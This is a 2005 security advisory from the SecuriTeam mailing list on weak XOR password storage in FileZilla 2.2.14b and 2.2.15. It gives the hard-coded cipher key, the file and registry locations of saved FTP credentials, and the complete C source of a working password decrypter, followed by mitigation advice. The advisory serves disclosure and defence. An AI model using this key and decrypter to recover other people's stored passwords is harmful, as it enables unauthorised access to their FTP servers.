[NT] FileZilla Weak Password Encryption

From: SecuriTeam (support_at_securiteam.com)
Date: 09/19/05

  • Next message: SecuriTeam: "[UNIX] ncompress Insecure Temporary File Creation" 
    To: list@securiteam.com
Date: 19 Sep 2005 10:37:21 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      FileZilla Weak Password Encryption
    ------------------------------------------------------------------------

    SUMMARY

    " <http://filezilla.sourceforge.net/> FileZilla is a fast and reliable FTP
    client and server with lots of useful features and an intuitive
    interface." The FileZilla client stores passwords using weak XOR
    substitution with static cypher key.

    DETAILS

    Vulnerable Systems:
     * FileZilla versions 2.2.14b and 2.2.15

    FileZilla saves configuration settings in two different locations:
     * In an XML file
     * In the Windows registry

    The method used to save configuration settings depends on the preferences
    used by the user during the installation of FileZilla. Either way, all
    configuration settings are stored in cleartext, EXCEPT for the password.
    However, the password is stored using very weak XOR "encryption" which can
    be easily reversed.

    There exists a problem in the way the XOR encryption is implemented
    because the same cipher key is always used. This key is hard-coded, which
    means that anyone can analyze the source code of the application and find
    it. Of course, this wouldn't be so easy if FileZilla wasn't an open source
    application.

    Once the key is known, an attacker can use it to decrypt the password back
    to its cleartext form. Because the XOR cryptographic algorithm used is
    symmetric, the same key is used for both, encrypting and decrypting.

    As mentioned before, the rest of the configuration settings are all in
    cleartext. Some information that would be useful for an attacker includes
    hostname of the server to connect to, default port, and username.

    If successfully exploited, this vulnerability will allow an attacker to
    access FTP (or SFTP) servers with the privileges of the user whose
    configuration settings were stolen from.

    In practice, this vulnerability could be exploited after a machine has
    been compromised, or by fooling the user into executing malicious code.
    Such code could dump the configuration settings, decrypt the password/s
    and sends them all to the attacker.

    It is common to see many popular trojans out there that exploit weak
    encryption vulnerabilities of this type. These trojans dump the
    credentials of popular applications such as Internet Explorer, VNC or even
    dialup connections. FileZilla could be the next added application in the
    list of all those trojans with password-dumping features.

    This vulnerability is somehow similar to the one found by Conde Vampiro in
    VNC 3 back in 1999. It's similar because in both cases we find an open
    source application using a fixed cipher key to decrypt passwords. Thus,
    making trivial to find the key.

    For more information on Conde Vampiro's findings visit:
    <http://www.securiteam.com/securitynews/3P5QERFQ0Q.html>
    http://www.securiteam.com/securitynews/3P5QERFQ0Q.html

    The XML configuration file is found at:
    %programfiles%\FileZilla\FileZilla.xml
    The configuration settings are saved in the registry in:
    Hive: HKEY_CURRENT_USER
    Key: Software\FileZilla\Site Manager\[site_name]\
    Where [site_name] is the name given to the connection by the user.
    The password is saved in the previous key as a value with the following
    properties:
    Value: Pass
    Type: REG_SZ (string terminated in NULL)

    The cipher key can be found in Crypt.cpp and its value is:
    FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ

    Solution:
    Choose "Use secure mode" during the installation (this disables FileZilla
    from saving passwords), lockdown your client machines where the FileZilla
    client is installed, or update to a patched version which fixes this issue
    (if available).

    Password Decrypter Code:
    /*

    Filename: filezilla-pwdec.c
    Title: FileZilla Client - Weakly encrypted password exploit v0.01
    Author: pagvac (Adrian Pastor)
    Date: 8th August, 2005
    License: GPL
    email: m123303[-a-t-]richmond.ac.uk
    homepage: www.ikwt.com (In Knowledge We Trust)
      www.adrianpv.com

    Description: this tool asks the user for the "encrypted" password and
      computes the cleartext version of the password

    Other info: compile as a Win32 console application project in Visual C++

    Copyright (C) 2005 pagvac (Adrian Pastor)

    This program is free software; you can redistribute it and/or
    modify it under the terms of the GNU General Public License
    as published by the Free Software Foundation; either version 2
    of the License, or (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
    02110-1301, USA.

    */

    //Includes
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <windows.h>

    //Macros
    #define MAX_SIZE 150
    #define SLEEP_TIME 5000

    //Global variable (cypher key)
    char *m_key = "FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";

    //PRE: decimal values representing ASCII chars,
    // every three digits becomes one ASCII char
    // e.g.: 042040063063
    //POST: ASCII chars are copied back to buff[]
    // e.g.: *(??
    // the length of the new string is returned
    int digit2char(char buff[])
    {
     char tmp_buff[4], ascii_buff[MAX_SIZE];
     unsigned int i=0, j=0, n=0, len=(strlen(buff)/3);
     for(i=0,j=0;i<strlen(buff);i+=3,++j)
     {
      tmp_buff[0]=buff[i];
      tmp_buff[1]=buff[i+1];
      tmp_buff[2]=buff[i+2];
      tmp_buff[3]='\0';
      
      n=atoi(tmp_buff);
      ascii_buff[j]=(char)n;
     }
     ascii_buff[j]='\0';
     printf("ascii_buff:%s\n", ascii_buff);
     strcpy(buff, ascii_buff);

     return len;
    }

    //PRE: buffer containing ASCII chars of cypher
    // (rather than their numberic ASCII value)
    //POST:length of cleartext password is returned
    unsigned int decrypt(char buff[])
    {
     unsigned int i, pos, len;
     
     len=digit2char(buff);
     pos=len%strlen(m_key);

     for (i=0;i<len;i++)
      buff[i]=buff[i]^m_key[(i+pos)%strlen(m_key)];

     return len;
    }

    int main(void)
    {
     char cypher[MAX_SIZE];
     unsigned int len=0,i=0;

     printf("Enter cypher (encrypted password)\ne.g.: 120125125112000\n->");
     scanf("%s", cypher);
     if(strlen(cypher)%3==0)
     {
      len=decrypt(cypher);
      printf("cleartext password:");
      for(i=0;i<len;++i)
       printf("%c",cypher[i]);
      printf("\n");
     }
     else
     {
      printf("You didn't enter a valid cypher!\n");
      printf("It should be a numeric value whose length is multiple of 3\n");
     }

     printf("Ending program in %d seconds...\n", SLEEP_TIME/1000);
     Sleep(SLEEP_TIME);
     return 0;
    }

    Complete Proof of concept code can be found at:
    <http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zip>
    http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zip

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:m123303@richmond.ac.uk>
    pagvac (Adrian Pastor).
    The original article can be found at:
    <http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zip>
    http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zip

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] ncompress Insecure Temporary File Creation"

    Relevant Pages